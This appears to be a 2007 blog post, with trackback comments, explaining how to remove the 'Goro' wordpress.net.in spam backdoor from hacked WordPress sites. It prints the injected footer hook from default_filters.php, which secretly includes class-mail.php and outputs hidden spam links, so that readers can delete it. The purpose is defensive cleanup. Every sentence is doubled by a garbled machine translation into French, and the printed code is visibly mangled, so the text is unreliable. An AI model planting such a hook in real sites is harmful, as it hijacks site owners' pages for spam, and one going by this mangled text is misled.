I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’sa backdoor (wordpress.net.in). J'ai trouvé cela en compte lors de la navigation WordPress forum de support, certaines de ces victimes à mettre à jour leurs default_filters.php et transférez-classe Mail.php l'intérieur de leur WordPress sans être conscient que c'est une porte dérobée (wordpress.net.in). There is no class-mail.php in WordPress except class-phpmailer.php . Il n'ya pas de classe dans WordPress Mail.php l'exception de la classe-phpmailer.php. So don’t get confuse by it. Il en va de même pas confondre par celle-ci.
Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes. Voici une solution rapide sur comment vous pouvez supprimé la délinquance Goro spamware injection avant que Google vous interdit de les tuyaux Internet.
Workaround Palliatif
- For temporary disable remote include in php.ini settings. Pour désactiver à distance temporaire des paramètres dans le fichier php.ini.
;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;; ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. ;;;;;;;;;;;;;;;;;;; Fopen wrappers; ;;;;;;;;;;;;;;;;;;; Que ce soit pour permettre le traitement d'URL (comme http:// ou ftp://) comme des fichiers. allow_url_fopen = off allow_url_include = off allow_url_fopen = off allow_url_include = off
- Check your .htaccess for suspicious redirect. Vérifiez votre fichier. Htaccess pour rediriger suspectes.
- Find class-mail.php inside “*/wp-includes/” directory and removed it. Trouvez-classe Mail.php l'intérieur "* / wp-includes /" répertoire et enlevé.
- Find the following code inside “*/wp-includes/default_filters.php” and removed it Trouver le code suivant dans "* / wp-includes/default_filters.php" et supprimé
add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775'); function wpc7c16<>b8466d864eeefd20050625c7775() { @include(’./wp-includes/class-mail.php’); if(sizeof($wparr)>0){ echo “!div id=\”goro\”!”; foreach($wparr as $k=>$v){ echo ““.ucwords($v[’key’]).”\n”; if($i ==$inum) break; } echo “!/div!”.$_footer; } } add_action ( 'wp_footer', 'wpc7c16b8466d864eeefd20050625c7775'); fonction wpc7c16 <> b8466d864eeefd20050625c7775 () (@ include ( '. / wp-includes / classes Mail.php'); if (sizeof ($ wparr)> 0) (echo " ! div id = \ "Goro \"! "; foreach ($ wparr $ k => $ v) (echo" ". ucwords ($ v [ 'key'])." \ n"; if ($ i = = $ inum) break;) echo "! / div !".$_ pied de page;)) Robots.txt Exclusion Robots.txt
Optional - Prevent googlebot from indexing the static spam page. Facultatif - Empêcher l'indexation Googlebot de la page statique spam.
Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”. Vous devez vous identifier pour Wordpress Admin> Gérer> Dossiers> Autres fichiers → Saisissez "robots.txt". Add the following code. Ajoutez le code suivant.User-agent: Googlebot Disallow: /*?* Disallow: /*? User-agent: Googlebot Disallow: / * * Disallow: / *?
Possible WordPress class (suspicious) files that would be tempered WordPress possible classe (suspectes) qui serait tempéré
Md5 checksum the following files, compare it with official versions from WordPress Release Archive . Somme de contrôle MD5 les fichiers suivants, le comparer avec des versions officielles de WordPress Archives de sortie.
The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities. Les méthodes ci-dessus et de supprimer les spams handicapés liens, rien ne garantit qu'il sera protégé vous de la vulnérabilité. Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade . Backup (ou exporter votre poteau avec WordPress RSS-eXtended WRX) et d'effectuer une mise à jour complète.
- Dec 13, 2007 13 déc 2007
I just notice this recently. Je viens d'avis récemment. You’ll need to check your site HTTP Header. Vous aurez besoin de vérifier votre site-tête HTTP. Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500) . La plupart des sites ne détournent pas de réponse correcte Etat-tête HTTP (400 <> 500). My guess is they did this to cloak from being crawl by search engine spiders. Mon devine ce qu'ils ont fait à manteau d'être explorer moteur de recherche par les araignées. If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner . Si vous ont nettoyé tous les fichiers infectés et votre tête ne pas répondre correctement obtenir un rookit scanner.
Check your website status header, try cloak your browser (UA) as Search Engine Crawler. Vérifiez votre site état-tête, essayez manteau de votre navigateur (UA) comme moteur de recherche robot d'exploration. The following screenshot will show you how to setup this at web-sniffer.net. La capture d'écran suivante vous montrera comment installer ce à Web-sniffer.net.
This methods may not work if the cloaking scripts used IP base tracking. Mai Cette méthode ne fonctionnera pas si les scripts utilisés cloaking IP de base de suivi. So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver). Donc, essayer différentes chaîne agent utilisateur (c'est-à-dire: inoktomi, askjeeves, ia_archiver).
Firefox Browser Navigateur Firefox
You can also override your useragent string with firefox ↓. Vous pouvez aussi surcharger votre chaîne useragent avec firefox ↓.
about:config → general.useragent.overide = ‘ ua strings ‘ about: config general.useragent.overide → = 'unités de cordes "
Wordpress.net.in Backdoor Wordpress.net.in Backdoor
Extra info Information supplémentaire
Wordpress.net.in Doorway Wordpress.net.in Doorway
Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/ 24 déc 2007 → http://www.wordpress.net.in/mentors/alxumuk/
Backdoor Files Backdoor Fichiers
inside wp-includes directory. dans wp-includes répertoire.
- compat.php - (replace with latest version) compat.php - (remplacer par la dernière version)
- class-mail.php delete classe-Mail.php supprimer
scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins . analyse et supprime tous les fichiers caché et de créer un fichier. htaccess dans wp-includes & wp-content/plugins. Then add the following code to disabled directory listing (prevent informations leak & Directory search index). Ensuite, ajoutez le code suivant à la liste des répertoires handicapés (empêcher la fuite d'informations et répertoire index de recherche).
Options -Indexes Options-Indexes Wordpress.net.in New Partner Wordpress.net.in nouveau partenaire
Feb 23th 2008 , We found a similar signature like wordpress.net.in at qwetro.com (germany). 23 Février 2008, nous avons constaté la même signature comme wordpress.net.in à qwetro.com (Allemagne). Probably from the same attacker with different agenda. Probablement de la même attaquant avec différentes ordre du jour.
Related Posts Postes connexes
- Bluehost HostMonster CEO’s Blog hacked (wordpress.net.in) Bluehost HostMonster chef de la direction du Blog piraté (wordpress.net.in)
- Matt Heaton Bluehost Hostmonster CEO’s Hacked Again - Strike II Matt Heaton bluehost Hostmonster chef de la direction du nouveau piraté - Grève II
External Links Liens externes
- Websniffer View HTTP Request and Response Header Voir Websniffer requête HTTP et tête de réponse
- Wordpress Support Forum Wordpress forum de support
- National Vulnerability Database Wordpress 2.0 > 2.0.6 Base de données nationale vulnérabilité Wordpress 2,0> 2.0.6
16 Responses to “How to Remove Wordpress.net.in Spam Injection” 16 Responses to "Comment supprimer le spam Wordpress.net.in Injection"
[...] na enak problem, vendar o?itno jih je zelo malo rešilo vse skupaj. [...] Na enak problème, est distribuée o? Itno jih je zelo malo rešilo vse skupaj. Ampak Google dela ?udeže: How to Removed Wordpress.net.in Spam Injection Infected by ‘Goro’ Spam class-mail.php Backdoor In rešitev je [...] Ampak Google dela? Udeže: Comment Enlevée Wordpress.net.in Spam infectées par injection "Goro" Spam-classe Mail.php dérobée En rešitev je [...]
[...] I’ve find some useful information on how to clean that mess on Kakkoi: How to Removed Wordpress.net.in Spam Injection. [...] J'ai trouver des informations utiles sur la façon de nettoyer ce désordre sur Kakkoi: Comment Enlevée Wordpress.net.in Spam injection. [...]
[...] wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [...] Wordpress.net.in révélé un nombre de pages, y compris une entrée de blog par Avice De'vereux qui décrit les symptômes et ont dit qu'ils ont été provoqués par une injection de détourner le spam par [...]
[...] is what Gordon Dewis discovered: Googling wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [...] Est ce que Gordon Dewis la découverte: avec Google wordpress.net.in révélé un nombre de pages, y compris une entrée de blog par Avice De'vereux qui décrit les symptômes et ont dit qu'ils ont été provoqués par une injection de détourner le spam par [.. .]
[...] leads me to Avice’s perfectly wonderful life saving post, where she instructs how to remove [...] [...] M'amène à Avice est parfaitement merveilleux poste de sauvetage, où elle charge la façon d'éliminer les [...]
[...] en is alle gehackte code gevonden. [...] En est alle gehackte code gevonden. Mocht je last hebben van de div id=”Goro” hack kijk dan eens hier voor handige tips voor het verwijderen. Mocht je dernière hebben van de div id = "Goro" hack Kijk eens dan hier voor handige conseils voor het verwijderen. Alhoewel ik voorlopig geen PC klusjes zou doen gaan we toch [...] Alhoewel ik geen voorlopig PC klusjes zou doen gaan toch nous [...]
I got hacked to, mine was spam links to Je me suis entaillé, la mienne était spam de liens
donaldsensing.com:6666 donaldsensing.com: 6666[...] Related: Blogs Take Center Stage For Marketers And For Google How to Remove Wordpress.net.in Spam Injection [...] [...] Connexes: Blogs prendre Center Stage pour les marketers pour Google et la façon d'éliminer les spam Wordpress.net.in injection [...]
I'm not sure who is "alxumuk" real name is, but there is an editor at DMOZ with similar display name. Je ne suis pas sûr de qui est "alxumuk" vrai nom, mais il est un rédacteur à DMOZ avec la même nom d'affichage.
Lack Resources Manquent de ressourcesATM I only have a few raw accesslog from Murray's blog & Jens's blog . Matt Heaton never replies. ATM je ne dispose que de quelques crus de accesslog Murray's blog et le blog de Jens. Matt Heaton jamais de réponses.
I hope that Mr. Goro got careless and show his footprint, I need more raw access log. J'espère que M. Goro a négligence et de montrer son empreinte, j'ai besoin de plus d'un accès brut journal. Send it to my email Envoyez-le à mon e-mail
[...] might go Here to learn the way to remove the Spam [...] [...] Peut aller ici pour apprendre la manière d'éliminer le spam [...]
Co-Founder of Mozilla Project WordPress Blog's Hacked... Blake Ross, the Co-Founder of Mozilla Project WordPress Blog's Hacked by Wordpress.net.in Blackhat Spammer. Co-fondateur de Mozilla projet WordPress blog ... Hacked Blake Ross, le co-fondateur de Mozilla projet WordPress blog Hacked par Wordpress.net.in Blackhat pollupostage. ......
[...] het te maken had met spam injection hijack by wordpress.net.in. [...] Het te maken avait rencontré spam par injection détourner wordpress.net.in. Meer info over het probleem kan je hier vinden. Plus d'infos sur het probleem kan je hier vinden. De eenvoudigste oplossing voor het probleem, is een nieuwe versie van wordpress erop [...] De eenvoudigste oplossing voor het problème, est une nouvelle versie van wordpress erop [...]